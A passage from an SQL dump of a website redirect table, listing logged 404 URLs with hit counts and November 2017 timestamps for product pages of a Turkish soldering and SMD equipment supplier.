00:00:00',301),(9114,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,category_name?language=tr-tr',NULL,'','',14,0,'2017-11-06 02:39:34','0000-00-00 00:00:00',301),(9115,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,ordering?language=en-gb',NULL,'','',3,0,'2017-11-06 02:52:02','0000-00-00 00:00:00',301),(9116,'http://www.3s-technologies.com.tr/tr/ueruenler/konveyorler',NULL,'','',26,0,'2017-11-06 03:03:21','0000-00-00 00:00:00',301),(9117,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-06 03:20:47','0000-00-00 00:00:00',301),(9118,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/spartan-8s-8d-detail/askquestion?tmpl=component',NULL,'','',30,0,'2017-11-06 03:21:35','0000-00-00 00:00:00',301),(9119,'http://3s-technologies.com.tr/tr/ueruenler/manufacturers/kester',NULL,'','',16,0,'2017-11-06 03:31:47','0000-00-00 00:00:00',301),(9120,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/krem-lehim-31-32-detail/askquestion?tmpl=component',NULL,'','',8,0,'2017-11-06 03:32:41','0000-00-00 00:00:00',301),(9121,'http://www.3s-technologies.com.tr/tr/ueruenler/temizleme-makineleri',NULL,'','',25,0,'2017-11-06 03:37:10','0000-00-00 00:00:00',301),(9122,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',9,0,'2017-11-06 03:42:05','0000-00-00 00:00:00',301),(9123,'http://3s-technologies.com.tr/tr/ueruenler/lehimleme-malzemeleri/krem-lehim',NULL,'','',9,0,'2017-11-06 03:49:01','0000-00-00 00:00:00',301),(9124,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/mi-300-detail',NULL,'','',45,0,'2017-11-06 03:53:08','0000-00-00 00:00:00',301),(9125,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole/jv131-detail/askquestion?tmpl=component',NULL,'','',26,0,'2017-11-06 03:54:54','0000-00-00 00:00:00',301),(9126,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,pc.ordering,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-11-06 03:56:22','0000-00-00 00:00:00',301),(9127,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme',NULL,'','',354,0,'2017-11-06 04:10:27','0000-00-00 00:00:00',301),(9128,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by?language=tr-tr&product_sku',NULL,'','',1,0,'2017-11-06 04:25:52','0000-00-00 00:00:00',301),(9129,'http://3s-technologies.com.tr/index.php/en/products/manufacturers/aqueous',NULL,'','',24,0,'2017-11-06 04:33:05','0000-00-00 00:00:00',301),(9130,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,product_sku?language=en-gb',NULL,'','',24,0,'2017-11-06 04:36:33','0000-00-00 00:00:00',301),(9131,'http://3s-technologies.com.tr/en/products/screen-printer/spr-20-41-detail',NULL,'','',20,0,'2017-11-06 04:39:30','0000-00-00 00:00:00',301),(9132,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name?language=en-gb',NULL,'','',2,0,'2017-11-06 04:39:42','0000-00-00 00:00:00',301),(9133,'http://3s-technologies.com.tr/en/products/ess-310-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-06 04:41:18','0000-00-00 00:00:00',301),(9134,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/rh2-20-detail',NULL,'','',24,0,'2017-11-06 04:45:59','0000-00-00 00:00:00',301),(9135,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız',NULL,'','',565,0,'2017-11-06 05:07:31','0000-00-00 00:00:00',301),(9136,'http://3s-technologies.com.tr/en/?option=com_easyblog&view=dashboard&layout=write',NULL,'http://3s-technologies.com.tr/index.php?option=com_easyblog&view=dashboard&layout=write','',93,0,'2017-11-06 05:20:15','0000-00-00 00:00:00',301),(9137,'http://3s-technologies.com.tr/index.php/tr/ueruenler/le-40v-detail?tmpl=component&print=1',NULL,'','',17,0,'2017-11-06 05:24:38','0000-00-00 00:00:00',301),(9138,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/components/users-component/index.php/en/using-joomla/extensions/components/users-component/registration-form',NULL,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/users-component/registration-form','',2,0,'2017-11-06 05:24:39','0000-00-00 00:00:00',301),(9139,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/cs40-detail/askquestion?tmpl=component',NULL,'','',55,0,'2017-11-06 05:24:48','0000-00-00 00:00:00',301),(9140,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/by,product_name/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-11-06 05:27:02','0000-00-00 00:00:00',301),(9141,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/t_mi300_250x250.jpg',NULL,'','',3,0,'2017-11-06 05:32:57','0000-00-00 00:00:00',301),(9142,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/245-sn63pb37-0.8mm-detail/askquestion?tmpl=component',NULL,'','',8,0,'2017-11-06 05:33:18','0000-00-00 00:00:00',301),(9143,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,ordering?language=en-gb',NULL,'','',2,0,'2017-11-06 05:34:12','0000-00-00 00:00:00',301),(9144,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/ess-310-24-detail',NULL,'https://www.google.com.tr/','',219,0,'2017-11-06 05:36:12','0000-00-00 00:00:00',301),(9145,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fä±rä±n/by,mf_name',NULL,'','',2,0,'2017-11-06 05:38:55','0000-00-00 00:00:00',301),(9146,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-detail',NULL,'','',32,0,'2017-11-06 05:42:55','0000-00-00 00:00:00',301),(9147,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,mf_name',NULL,'','',721,0,'2017-11-06 05:58:48','0000-00-00 00:00:00',301),(9148,'http://www.3s-technologies.com.tr/tr/ueruenler/manufacturers/ddm-novastar',NULL,'','',27,0,'2017-11-06 06:02:14','0000-00-00 00:00:00',301),(9149,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim-31-detail?print=1&tmpl=component',NULL,'','',3,0,'2017-11-06 06:09:19','0000-00-00 00:00:00',301),(9150,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/zero-ion-g3-detail',NULL,'','',59,0,'2017-11-06 06:11:04','0000-00-00 00:00:00',301),(9151,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,product_name?language=en-gb',NULL,'','',2,0,'2017-11-06 06:12:14','0000-00-00 00:00:00',301),(9152,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim',NULL,'','',49,0,'2017-11-06 06:15:19','0000-00-00 00:00:00',301),(9153,'http://3s-technologies.com.tr/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim',NULL,'','',9,0,'2017-11-06 06:16:28','0000-00-00 00:00:00',301),(9154,'http://www.3s-technologies.com.tr/index.php/en/products/trident-detail?tmpl=component&print=1',NULL,'','',27,0,'2017-11-06 06:19:46','0000-00-00 00:00:00',301),(9155,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,product_sku',NULL,'','',16,0,'2017-11-06 06:26:52','0000-00-00 00:00:00',301),(9156,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,mf_name/dirdesc?language=en-gb',NULL,'','',15,0,'2017-11-06 06:29:04','0000-00-00 00:00:00',301),(9157,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/cm-602-l-detail/askquestion?tmpl=component',NULL,'','',186,0,'2017-11-06 06:31:39','0000-00-00 00:00:00',301),(9158,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri',NULL,'','',45,0,'2017-11-06 06:42:25','0000-00-00 00:00:00',301),(9159,'http://www.3s-technologies.com.tr/tr/ueruenler/lehimleme-malzemeleri/krem-lehim',NULL,'','',29,0,'2017-11-06 06:42:47','0000-00-00 00:00:00',301),(9160,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı?language=en-gb',NULL,'','',1,0,'2017-11-06 06:46:27','0000-00-00 00:00:00',301),(9161,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/dirdesc',NULL,'','',30,0,'2017-11-06 06:53:10','0000-00-00 00:00:00',301),(9162,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name',NULL,'','',670,0,'2017-11-06 06:53:42','0000-00-00 00:00:00',301),(9163,'http://www.3s-technologies.com.tr/en/products/thru-hole/rl132-detail',NULL,'','',308,0,'2017-11-06 06:54:57','0000-00-00 00:00:00',301),(9164,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/dirdesc',NULL,'','',18,0,'2017-11-06 07:01:15','0000-00-00 00:00:00',301),(9165,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/rh2-20-detail',NULL,'','',2,0,'2017-11-06 07:11:47','0000-00-00 00:00:00',301),(9166,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/avf-detail',NULL,'','',42,0,'2017-11-06 07:11:53','0000-00-00 00:00:00',301),(9167,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/avb-detail',NULL,'','',47,0,'2017-11-06 07:20:19','0000-00-00 00:00:00',301),(9168,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/dirdesc',NULL,'','',18,0,'2017-11-06 07:20:47','0000-00-00 00:00:00',301),(9169,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/spr-20-41-42-detail/askquestion?tmpl=component',NULL,'','',26,0,'2017-11-06 07:47:22','0000-00-00 00:00:00',301),(9170,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler',NULL,'','',48,0,'2017-11-06 08:00:31','0000-00-00 00:00:00',301),(9171,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,`p`.product_sku?language=tr-tr',NULL,'','',24,0,'2017-11-06 08:09:22','0000-00-00 00:00:00',301),(9172,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-06 08:26:40','0000-00-00 00:00:00',301),(9173,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,product_name/dirdesc?language=en-gb',NULL,'','',15,0,'2017-11-06 08:29:56','0000-00-00 00:00:00',301),(9174,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,product_name?language=tr-tr',NULL,'','',1,0,'2017-11-06 08:30:14','0000-00-00 00:00:00',301),(9175,'http://3s-technologies.com.tr/tr/ueruenler/manufacturers/ddm-novastar',NULL,'','',16,0,'2017-11-06 08:34:54','0000-00-00 00:00:00',301),(9176,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,product_name/dirdesc?language=en-gb',NULL,'','',16,0,'2017-11-06 08:43:09','0000-00-00 00:00:00',301),(9177,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,mf_name?language=tr-tr',NULL,'','',1,0,'2017-11-06 08:46:03','0000-00-00 00:00:00',301),(9178,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,product_sku?language=tr-tr',NULL,'','',25,0,'2017-11-06 09:14:00','0000-00-00 00:00:00',301),(9179,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/by,product_name',NULL,'','',38,0,'2017-11-06 09:18:28','0000-00-00 00:00:00',301),(9180,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın?language=en-gb',NULL,'','',1,0,'2017-11-06 09:28:11','0000-00-00 00:00:00',301),(9181,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı',NULL,'','',497,0,'2017-11-06 09:28:15','0000-00-00 00:00:00',301),(9182,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku?language=en-gb',NULL,'','',33,0,'2017-11-06 09:28:16','0000-00-00 00:00:00',301),(9183,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name?language=en-gb',NULL,'','',6,0,'2017-11-06 09:28:18','0000-00-00 00:00:00',301),(9184,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name?language=en-gb',NULL,'','',5,0,'2017-11-06 09:28:20','0000-00-00 00:00:00',301),(9185,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name?language=en-gb',NULL,'','',6,0,'2017-11-06 09:28:22','0000-00-00 00:00:00',301),(9186,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız',NULL,'','',487,0,'2017-11-06 09:28:24','0000-00-00 00:00:00',301),(9187,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name?language=en-gb',NULL,'','',5,0,'2017-11-06 09:28:25','0000-00-00 00:00:00',301),(9188,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name?language=en-gb',NULL,'','',5,0,'2017-11-06 09:28:27','0000-00-00 00:00:00',301),(9189,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name?language=en-gb',NULL,'','',5,0,'2017-11-06 09:28:29','0000-00-00 00:00:00',301),(9190,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,product_sku?language=en-gb',NULL,'','',5,0,'2017-11-06 09:28:32','0000-00-00 00:00:00',301),(9191,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/dirdesc?language=en-gb',NULL,'','',5,0,'2017-11-06 09:28:34','0000-00-00 00:00:00',301),(9192,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı',NULL,'','',246,0,'2017-11-06 09:28:38','0000-00-00 00:00:00',301),(9193,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku?language=en-gb',NULL,'','',244,0,'2017-11-06 09:28:39','0000-00-00 00:00:00',301),(9194,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız/by,ordering?language=en-gb',NULL,'','',1,0,'2017-11-06 09:36:44','0000-00-00 00:00:00',301),(9195,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/le-40v-detail',NULL,'','',284,0,'2017-11-06 09:36:45','0000-00-00 00:00:00',301),(9196,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/ls60v-detail',NULL,'','',280,0,'2017-11-06 09:36:47','0000-00-00 00:00:00',301),(9197,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-06 09:36:51','0000-00-00 00:00:00',301),(9198,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc',NULL,'','',556,0,'2017-11-06 09:36:53','0000-00-00 00:00:00',301),(9199,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/dirdesc',NULL,'','',548,0,'2017-11-06 09:36:54','0000-00-00 00:00:00',301),(9200,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name',NULL,'','',553,0,'2017-11-06 09:36:56','0000-00-00 00:00:00',301),(9201,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name',NULL,'','',555,0,'2017-11-06 09:36:58','0000-00-00 00:00:00',301),(9202,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name',NULL,'','',537,0,'2017-11-06 09:37:01','0000-00-00 00:00:00',301),(9203,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',538,0,'2017-11-06 09:37:04','0000-00-00 00:00:00',301),(9204,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',541,0,'2017-11-06 09:37:05','0000-00-00 00:00:00',301),(9205,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',542,0,'2017-11-06 09:37:07','0000-00-00 00:00:00',301),(9206,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',549,0,'2017-11-06 09:37:11','0000-00-00 00:00:00',301),(9207,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-11-06 09:37:16','0000-00-00 00:00:00',301),(9208,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-06 09:37:22','0000-00-00 00:00:00',301),(9209,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-ultra-hız',NULL,'','',539,0,'2017-11-06 09:37:31','0000-00-00 00:00:00',301),(9210,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',539,0,'2017-11-06 09:37:33','0000-00-00 00:00:00',301),(9211,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',535,0,'2017-11-06 09:37:39','0000-00-00 00:00:00',301),(9212,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name?language=en-gb',NULL,'','',1,0,'2017-11-06 09:37:44','0000-00-00 00:00:00',301),(9213,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,ordering',NULL,'','',543,0,'2017-11-06 09:37:51','0000-00-00 00:00:00',301),(9214,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/tolo/smd-fırın/dirdesc',NULL,'','',555,0,'2017-11-06 09:37:58','0000-00-00 00:00:00',301),(9215,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',549,0,'2017-11-06 09:38:04','0000-00-00 00:00:00',301),(9216,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/by,category_name?language=en-gb',NULL,'','',1,0,'2017-11-06 09:38:08','0000-00-00 00:00:00',301),(9217,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/çubuk-lehim/by,category_name',NULL,'','',550,0,'2017-11-06 09:38:11','0000-00-00 00:00:00',301),(9218,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/çubuk-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-06 09:38:13','0000-00-00 00:00:00',301),(9219,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/çubuk-lehim/e-bar-detail',NULL,'','',266,0,'2017-11-06 09:38:14','0000-00-00 00:00:00',301),(9220,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/çubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',267,0,'2017-11-06 09:38:16','0000-00-00 00:00:00',301),(9221,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-06 09:38:18','0000-00-00 00:00:00',301),(9222,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/by,`p`.product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-06 09:38:20','0000-00-00 00:00:00',301),(9223,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/by,category_name',NULL,'','',529,0,'2017-11-06 09:38:22','0000-00-00 00:00:00',301),(9224,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/by,category_name/dirdesc',NULL,'','',528,0,'2017-11-06 09:38:23','0000-00-00 00:00:00',301),(9225,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/by,mf_name',NULL,'','',526,0,'2017-11-06 09:38:31','0000-00-00 00:00:00',301),(9226,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',528,0,'2017-11-06 09:38:35','0000-00-00 00:00:00',301),(9227,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/by,ordering',NULL,'','',527,0,'2017-11-06 09:38:41','0000-00-00 00:00:00',301),(9228,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/by,product_name',NULL,'','',527,0,'2017-11-06 09:38:44','0000-00-00 00:00:00',301),(9229,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/by,product_name/dirdesc',NULL,'','',530,0,'2017-11-06 09:38:46','0000-00-00 00:00:00',301),(9230,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/by,product_sku',NULL,'','',527,0,'2017-11-06 09:38:51','0000-00-00 00:00:00',301),(9231,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,product_name',NULL,'','',511,0,'2017-11-06 09:38:53','0000-00-00 00:00:00',301),(9232,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,ordering',NULL,'','',517,0,'2017-11-06 09:38:55','0000-00-00 00:00:00',301),(9233,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,product_name',NULL,'','',521,0,'2017-11-06 09:38:57','0000-00-00 00:00:00',301),(9234,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,product_name/dirdesc',NULL,'','',517,0,'2017-11-06 09:38:59','0000-00-00 00:00:00',301),(9235,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,product_sku',NULL,'','',512,0,'2017-11-06 09:39:04','0000-00-00 00:00:00',301),(9236,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/dirdesc',NULL,'','',513,0,'2017-11-06 09:39:08','0000-00-00 00:00:00',301),(9237,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-düşük-hızlı',NULL,'','',514,0,'2017-11-06 09:39:13','0000-00-00 00:00:00',301),(9238,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-düşük-hızlı/by,`p`.product_sku',NULL,'','',514,0,'2017-11-06 09:39:15','0000-00-00 00:00:00',301),(9239,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-düşük-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',513,0,'2017-11-06 09:39:17','0000-00-00 00:00:00',301),(9240,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-düşük-hızlı/by,category_name',NULL,'','',513,0,'2017-11-06 09:39:23','0000-00-00 00:00:00',301),(9241,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-düşük-hızlı/by,category_name/dirdesc',NULL,'','',516,0,'2017-11-06 09:39:25','0000-00-00 00:00:00',301),(9242,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-düşük-hızlı/by,mf_name',NULL,'','',514,0,'2017-11-06 09:39:30','0000-00-00 00:00:00',301),(9243,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-düşük-hızlı/by,mf_name/dirdesc',NULL,'','',510,0,'2017-11-06 09:39:32','0000-00-00 00:00:00',301),(9244,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-düşük-hızlı/by,ordering',NULL,'','',515,0,'2017-11-06 09:39:39','0000-00-00 00:00:00',301),(9245,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_name',NULL,'','',520,0,'2017-11-06 09:39:42','0000-00-00 00:00:00',301),(9246,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_name/dirdesc',NULL,'','',519,0,'2017-11-06 09:39:44','0000-00-00 00:00:00',301),(9247,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_sku',NULL,'','',517,0,'2017-11-06 09:39:49','0000-00-00 00:00:00',301),(9248,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-düşük-hızlı/cs40-detail',NULL,'','',257,0,'2017-11-06 09:39:54','0000-00-00 00:00:00',301),(9249,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-düşük-hızlı/cs40-detail/askquestion?tmpl=component',NULL,'','',259,0,'2017-11-06 09:39:56','0000-00-00 00:00:00',301),(9250,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-düşük-hızlı/dirdesc',NULL,'','',522,0,'2017-11-06 09:39:58','0000-00-00 00:00:00',301),(9251,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-düşük-hızlı/le-40v-detail',NULL,'','',263,0,'2017-11-06 09:40:03','0000-00-00 00:00:00',301),(9252,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-düşük-hızlı/le-40v-detail/askquestion?tmpl=component',NULL,'','',260,0,'2017-11-06 09:40:04','0000-00-00 00:00:00',301),(9253,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,product_name',NULL,'','',598,0,'2017-11-06 09:42:33','0000-00-00 00:00:00',301),(9254,'http://3s-technologies.com.tr/tr/ueruenler/lehimleme-malzemeleri/tel-lehim',NULL,'','',19,0,'2017-11-06 09:50:41','0000-00-00 00:00:00',301),(9255,'http://www.3s-technologies.com.tr/tr/ueruenler/manufacturers/kester',NULL,'','',27,0,'2017-11-06 09:58:33','0000-00-00 00:00:00',301),(9256,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/by,product_name',NULL,'','',411,0,'2017-11-06 10:02:26','0000-00-00 00:00:00',301),(9257,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/avb-detail',NULL,'','',8,0,'2017-11-06 10:12:30','0000-00-00 00:00:00',301),(9258,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/by,product_sku',NULL,'','',595,0,'2017-11-06 10:12:49','0000-00-00 00:00:00',301),(9259,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name?language=en-gb',NULL,'','',3,0,'2017-11-06 10:16:30','0000-00-00 00:00:00',301),(9260,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name?language=en-gb',NULL,'','',6,0,'2017-11-06 10:17:15','0000-00-00 00:00:00',301),(9261,'http://www.3s-technologies.com.tr/tr/ueruenler/smd-fırın',NULL,'','',28,0,'2017-11-06 10:19:46','0000-00-00 00:00:00',301),(9262,'http://3s-technologies.com.tr/tr/urunler/dalga-lehim/lfs-1-detail',NULL,'','',24,0,'2017-11-06 